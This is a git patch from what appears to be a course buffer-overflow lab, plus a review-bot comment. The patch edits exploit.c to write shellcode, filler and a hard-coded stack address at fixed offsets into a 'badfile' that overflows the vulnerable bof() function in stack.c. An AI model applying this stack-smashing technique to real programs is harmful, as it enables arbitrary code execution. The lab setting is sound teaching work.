From eb27487128877705ff1407c31fec1a705847b997 Mon Sep 17 00:00:00 2001
From: Alex Huddleston
Date: Tue, 13 Feb 2018 23:18:43 -0600
Subject: [PATCH] Works with gdb in the included VM.
---
 hw2/badfile | Bin 517 -> 517 bytes
 hw2/exploit.c | 10 ++++++++--
 hw2/stack.c | 2 +-
 3 files changed, 9 insertions(+), 3 deletions(-)
diff --git a/hw2/badfile b/hw2/badfile
index d644f843d93a7fbe7189085c6f7ef985b858c7cc..fa315c7ebb6a8c6dbeb00c35e36fed7e91c4e7c0 100644
GIT binary patch literal 517 zcmbO*0TulC^nX7CvXJ3{fDHYr;*1Raq|Cg|#{t2e4`*)RKHK0(BtS6?+2B$3pa}s0 DNrMz; literal 517 mcmXp!5Rjo?Rh*HbpOl%``8XiB^Wn@5+-DmYCX9j+69NEeNFV0_
diff --git a/hw2/exploit.c b/hw2/exploit.c
index 6f0c834..362325d 100755
--- a/hw2/exploit.c
+++ b/hw2/exploit.c
@@ -27,9 +27,15 @@ int main(int argc, char **argv)
 /* Initialize buffer with 0x90 (NOP instruction) */
 memset(&buffer, 0x90, 517);
-
+
 /* You need to fill the buffer with appropriate contents here */
- strcpy(buffer, shellcode);
+
+ // Inject the shellcode into the buffer.
+ strcpy(&buffer[33], shellcode);
+ // Padding...
+ strcpy(&buffer[57], "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
+ // Point ebp register to the injected code.
+ strcpy(&buffer[16], "\xf8\xf2\xff\xbf");
 /* Save the contents to the file "badfile" */
 badfile = fopen("./badfile", "w");
diff --git a/hw2/stack.c b/hw2/stack.c
index 4fba173..dcc06d3 100755
--- a/hw2/stack.c
+++ b/hw2/stack.c
@@ -15,7 +15,7 @@ int bof(char *str)
 return 1;
 }
-void main(int argc, char **argv)
+int main(int argc, char **argv)
 {
 char str[517];
 FILE *badfile;
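Review bot: The offsets 16, 33 and 57 and the four-byte literal `"\xf8\xf2\xff\xbf"` in the added `strcpy` calls of hw2/exploit.c are unexplained magic numbers, and the comment on the last call states what the write affects without recording how that was established. Going by the commit subject they were measured under gdb in the course VM, so they presumably hold only for that build of stack.c in that environment (likely with address randomization turned off, which is not visible here). I would give the offsets names and record their provenance next to them, e.g. `/* Offsets and address measured under gdb in the lab VM; valid only for that build and environment. */`. The `// Padding...` comment should likewise state the filler's length and why it is there. The body of main starts and ends outside the hunk.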